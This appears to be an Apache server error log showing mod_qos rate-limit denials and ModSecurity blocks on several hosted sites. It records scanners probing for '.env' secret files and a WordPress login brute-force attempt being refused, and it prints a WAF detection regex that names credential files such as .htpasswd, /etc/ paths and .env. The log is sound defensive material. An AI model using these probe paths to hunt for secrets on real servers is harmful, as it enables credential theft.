[Tue May 26 19:54:59.594257 2026] [qos:error] [pid 86490:tid 86681] [client 45.148.10.120:56898] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtO1ZMwN0DpLVWo6LJ1gAAAMI
[Tue May 26 19:54:59.597491 2026] [qos:error] [pid 86490:tid 86741] [client 45.148.10.120:49336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtO1ZMwN0DpLVWo6LJ1wAAAP4
[Tue May 26 19:54:59.649104 2026] [qos:error] [pid 93576:tid 93715] [client 45.148.10.120:43422] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtO2DRMqfxdEDkoszVWgAAAAM
[Tue May 26 19:54:59.795100 2026] [qos:error] [pid 93868:tid 94359] [client 45.148.10.120:43404] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtO0qK9k_ZUB2Vp25NywAAAfQ
[Tue May 26 19:54:59.796004 2026] [qos:error] [pid 86490:tid 86621] [client 45.148.10.120:56898] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtO1ZMwN0DpLVWo6LJ2gAAAIY
[Tue May 26 19:54:59.796563 2026] [qos:error] [pid 86490:tid 86715] [client 45.148.10.120:35122] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtO1ZMwN0DpLVWo6LJ3AAAAOQ
[Tue May 26 19:54:59.796892 2026] [qos:error] [pid 86490:tid 86672] [client 45.148.10.120:60128] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtO1ZMwN0DpLVWo6LJ2wAAALk
[Tue May 26 19:54:59.797371 2026] [qos:error] [pid 86490:tid 86724] [client 45.148.10.120:49336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtO1ZMwN0DpLVWo6LJ3QAAAO0
[Tue May 26 19:54:59.800703 2026] [qos:error] [pid 93868:tid 94363] [client 45.148.10.120:60112] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtO0qK9k_ZUB2Vp25NzAAAAfg
[Tue May 26 19:54:59.801278 2026] [qos:error] [pid 86490:tid 86677] [client 45.148.10.120:43392] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtO1ZMwN0DpLVWo6LJ3gAAAL4
[Tue May 26 19:54:59.801316 2026] [qos:error] [pid 93868:tid 94266] [client 45.148.10.120:43412] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtO0qK9k_ZUB2Vp25NzQAAAZc
[Tue May 26 19:54:59.802231 2026] [qos:error] [pid 93576:tid 93766] [client 45.148.10.120:43422] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtO2DRMqfxdEDkoszVYAAAADY
[Tue May 26 19:54:59.872294 2026] [qos:error] [pid 86490:tid 86650] [client 45.148.10.120:60166] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtO1ZMwN0DpLVWo6LJ3wAAAKM
[Tue May 26 19:54:59.935219 2026] [security2:error] [pid 86490:tid 86700] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtO1ZMwN0DpLVWo6LJxQAAANU"]
[Tue May 26 19:55:00.078108 2026] [security2:error] [pid 86490:tid 86713] [client 185.177.72.53:56282] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/tests/default_settings/v11.0/.env"] [unique_id "ahWtPFZMwN0DpLVWo6LJ4QAAAOI"]
[Tue May 26 19:55:00.240194 2026] [security2:error] [pid 86490:tid 86667] [client 185.177.72.53:56282] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/test/bdd/fixtures/did-method-rest/.env"] [unique_id "ahWtPFZMwN0DpLVWo6LJ4wAAALQ"]
[Tue May 26 19:55:00.274978 2026] [security2:error] [pid 93576:tid 93729] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOmDRMqfxdEDkoszVBgAAABE"]
[Tue May 26 19:55:00.278238 2026] [security2:error] [pid 93868:tid 94361] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOkqK9k_ZUB2Vp25NrAAAAfY"]
[Tue May 26 19:55:00.279671 2026] [security2:error] [pid 93576:tid 93777] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOmDRMqfxdEDkoszVDgAAAEE"]
[Tue May 26 19:55:00.280807 2026] [security2:error] [pid 93576:tid 93721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOmDRMqfxdEDkoszVDAAAAAk"]
[Tue May 26 19:55:00.290297 2026] [security2:error] [pid 93868:tid 94373] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOkqK9k_ZUB2Vp25NrwAAAgI"]
[Tue May 26 19:55:00.291438 2026] [security2:error] [pid 93868:tid 94276] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOkqK9k_ZUB2Vp25NswAAAaE"]
[Tue May 26 19:55:00.300785 2026] [security2:error] [pid 86490:tid 86690] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOlZMwN0DpLVWo6LJrAAAAMs"]
[Tue May 26 19:55:00.305063 2026] [security2:error] [pid 93576:tid 93835] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOmDRMqfxdEDkoszVEAAAAHs"]
[Tue May 26 19:55:00.313006 2026] [security2:error] [pid 86490:tid 86639] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOlZMwN0DpLVWo6LJmwAAAJg"]
[Tue May 26 19:55:00.328163 2026] [security2:error] [pid 93868:tid 94278] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOkqK9k_ZUB2Vp25NuQAAAaM"]
[Tue May 26 19:55:00.329342 2026] [security2:error] [pid 86490:tid 86712] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOlZMwN0DpLVWo6LJjwAAAOE"]
[Tue May 26 19:55:00.334470 2026] [security2:error] [pid 86490:tid 86635] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOlZMwN0DpLVWo6LJnQAAAJQ"]
[Tue May 26 19:55:00.339737 2026] [security2:error] [pid 93868:tid 94271] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOkqK9k_ZUB2Vp25NsAAAAZw"]
[Tue May 26 19:55:00.341691 2026] [security2:error] [pid 86490:tid 86709] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOlZMwN0DpLVWo6LJnAAAAN4"]
[Tue May 26 19:55:00.341880 2026] [security2:error] [pid 93576:tid 93815] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtO2DRMqfxdEDkoszVGQAAAGc"]
[Tue May 26 19:55:00.352194 2026] [security2:error] [pid 86490:tid 86671] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtO1ZMwN0DpLVWo6LJwQAAALg"]
[Tue May 26 19:55:00.368071 2026] [security2:error] [pid 86490:tid 86708] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOlZMwN0DpLVWo6LJjgAAAN0"]
[Tue May 26 19:55:00.372050 2026] [security2:error] [pid 93868:tid 94280] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOkqK9k_ZUB2Vp25NugAAAaU"]
[Tue May 26 19:55:00.378419 2026] [security2:error] [pid 93576:tid 93774] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtO2DRMqfxdEDkoszVKgAAAD4"]
[Tue May 26 19:55:00.385203 2026] [security2:error] [pid 86490:tid 86703] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOlZMwN0DpLVWo6LJkAAAANg"]
[Tue May 26 19:55:00.394043 2026] [security2:error] [pid 93868:tid 94302] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOkqK9k_ZUB2Vp25NuAAAAbs"]
[Tue May 26 19:55:00.401071 2026] [security2:error] [pid 86490:tid 86701] [client 185.177.72.53:56282] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/www/html/bolt/.env"] [unique_id "ahWtPFZMwN0DpLVWo6LJ7gAAANY"]
[Tue May 26 19:55:00.407133 2026] [security2:error] [pid 93576:tid 93748] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtO2DRMqfxdEDkoszVGgAAACQ"]
[Tue May 26 19:55:00.413076 2026] [security2:error] [pid 93576:tid 93787] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtO2DRMqfxdEDkoszVNgAAAEs"]
[Tue May 26 19:55:00.428742 2026] [security2:error] [pid 93576:tid 93737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtO2DRMqfxdEDkoszVLQAAABk"]
[Tue May 26 19:55:00.433039 2026] [security2:error] [pid 93576:tid 93764] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtO2DRMqfxdEDkoszVOwAAADQ"]
[Tue May 26 19:55:00.435586 2026] [security2:error] [pid 93868:tid 94374] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOkqK9k_ZUB2Vp25NuwAAAgM"]
[Tue May 26 19:55:00.440496 2026] [security2:error] [pid 93576:tid 93770] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtO2DRMqfxdEDkoszVKAAAADo"]
[Tue May 26 19:55:00.444553 2026] [security2:error] [pid 93576:tid 93756] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtO2DRMqfxdEDkoszVLAAAACw"]
[Tue May 26 19:55:00.446611 2026] [security2:error] [pid 93576:tid 93747] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtO2DRMqfxdEDkoszVRAAAACM"]
[Tue May 26 19:55:00.560634 2026] [security2:error] [pid 86490:tid 86616] [remote 123.30.233.13:58346] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahWtPFZMwN0DpLVWo6LJ8gAAq30"], referer: https://veganfoodindia.com/wp-login.php
[Tue May 26 19:55:00.569049 2026] [qos:error] [pid 93868:tid 94350] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtPEqK9k_ZUB2Vp25N8wAAAes
[Tue May 26 19:55:00.570286 2026] [qos:error] [pid 86490:tid 86700] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtPFZMwN0DpLVWo6LKBAAAANU
[Tue May 26 19:55:00.574058 2026] [qos:error] [pid 93868:tid 94368] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtPEqK9k_ZUB2Vp25N9QAAAf0
[Tue May 26 19:55:00.584212 2026] [qos:error] [pid 93868:tid 94319] [client 45.148.10.120:49458] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPEqK9k_ZUB2Vp25N9gAAAcw
[Tue May 26 19:55:00.584346 2026] [qos:error] [pid 86490:tid 86737] [client 45.148.10.120:60088] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPFZMwN0DpLVWo6LKBgAAAPo
[Tue May 26 19:55:00.592497 2026] [qos:error] [pid 86490:tid 86638] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPFZMwN0DpLVWo6LKBwAAAJc
[Tue May 26 19:55:00.592680 2026] [qos:error] [pid 93576:tid 93835] [client 45.148.10.120:35270] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPGDRMqfxdEDkoszVggAAAHs
[Tue May 26 19:55:00.594309 2026] [qos:error] [pid 86490:tid 86705] [client 45.148.10.120:49344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPFZMwN0DpLVWo6LKCAAAANo
[Tue May 26 19:55:00.602042 2026] [qos:error] [pid 93576:tid 93830] [client 45.148.10.120:43380] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPGDRMqfxdEDkoszVgwAAAHY
[Tue May 26 19:55:00.705199 2026] [qos:error] [pid 93576:tid 93788] [client 45.148.10.120:43426] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPGDRMqfxdEDkoszVhAAAAEw
[Tue May 26 19:55:00.777039 2026] [qos:error] [pid 86490:tid 86648] [client 45.148.10.120:49344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPFZMwN0DpLVWo6LKCwAAAKE
[Tue May 26 19:55:00.777980 2026] [qos:error] [pid 93576:tid 93820] [client 45.148.10.120:35270] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPGDRMqfxdEDkoszVhwAAAGw
[Tue May 26 19:55:00.778223 2026] [qos:error] [pid 86490:tid 86674] [client 45.148.10.120:60088] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPFZMwN0DpLVWo6LKDAAAALs
[Tue May 26 19:55:00.778686 2026] [qos:error] [pid 86490:tid 86718] [client 45.148.10.120:49406] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPFZMwN0DpLVWo6LKDQAAAOc
[Tue May 26 19:55:00.781007 2026] [qos:error] [pid 93868:tid 94323] [client 45.148.10.120:49458] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPEqK9k_ZUB2Vp25N9wAAAdA
[Tue May 26 19:55:00.781291 2026] [qos:error] [pid 93868:tid 94265] [client 45.148.10.120:56914] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPEqK9k_ZUB2Vp25N-AAAAZY
[Tue May 26 19:55:00.783259 2026] [qos:error] [pid 93576:tid 93815] [client 45.148.10.120:43380] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPGDRMqfxdEDkoszViAAAAGc
[Tue May 26 19:55:01.053447 2026] [security2:error] [pid 86490:tid 86667] [client 185.177.72.53:56282] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/vue-app/server/.env"] [unique_id "ahWtPVZMwN0DpLVWo6LKEQAAALQ"]
[Tue May 26 19:55:01.087832 2026] [qos:error] [pid 93868:tid 94360] [client 45.148.10.120:43442] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPUqK9k_ZUB2Vp25N_gAAAfU
[Tue May 26 19:55:01.108221 2026] [qos:error] [pid 93576:tid 93774] [client 45.148.10.120:43444] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPWDRMqfxdEDkoszVjgAAAD4
[Tue May 26 19:55:01.268739 2026] [qos:error] [pid 93576:tid 93737] [client 45.148.10.120:35270] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPWDRMqfxdEDkoszVkAAAABk
[Tue May 26 19:55:01.269035 2026] [qos:error] [pid 86490:tid 86676] [client 45.148.10.120:49344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPVZMwN0DpLVWo6LKFAAAAL0
[Tue May 26 19:55:01.269462 2026] [qos:error] [pid 93576:tid 93781] [client 45.148.10.120:43426] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPWDRMqfxdEDkoszVkQAAAEU
[Tue May 26 19:55:01.270744 2026] [qos:error] [pid 86490:tid 86729] [client 45.148.10.120:60088] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPVZMwN0DpLVWo6LKFQAAAPI
[Tue May 26 19:55:01.272530 2026] [qos:error] [pid 86490:tid 86620] [client 45.148.10.120:49406] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPVZMwN0DpLVWo6LKFgAAAIU
[Tue May 26 19:55:01.276039 2026] [qos:error] [pid 93576:tid 93805] [client 45.148.10.120:43380] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPWDRMqfxdEDkoszVkgAAAF0
[Tue May 26 19:55:01.277808 2026] [qos:error] [pid 93868:tid 94330] [client 45.148.10.120:49458] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPUqK9k_ZUB2Vp25OBgAAAdc
[Tue May 26 19:55:01.278753 2026] [qos:error] [pid 93868:tid 94330] [client 45.148.10.120:56914] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtPUqK9k_ZUB2Vp25OBwAAAdc
[Tue May 26 19:55:01.283501 2026] [security2:error] [pid 93576:tid 93739] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtO2DRMqfxdEDkoszVFwAAABs"]
[Tue May 26 19:55:01.284315 2026] [security2:error] [pid 93576:tid 93838] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtO2DRMqfxdEDkoszVJwAAAH4"]
[Tue May 26 19:55:01.285309 2026] [security2:error] [pid 93576:tid 93767] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtO2DRMqfxdEDkoszVMwAAADc"]
[Tue May 26 19:55:01.287990 2026] [security2:error] [pid 93576:tid 93798] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtO2DRMqfxdEDkoszVLgAAAFY"]
[Tue May 26 19:55:01.288366 2026] [security2:error] [pid 93576:tid 93762] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtO2DRMqfxdEDkoszVKQAAADI"]
[Tue May 26 19:55:01.290398 2026] [security2:error] [pid 93576:tid 93723] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtO2DRMqfxdEDkoszVOgAAAAs"]
[Tue May 26 19:55:01.295448 2026] [security2:error] [pid 93576:tid 93795] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtO2DRMqfxdEDkoszVUAAAAFM"]
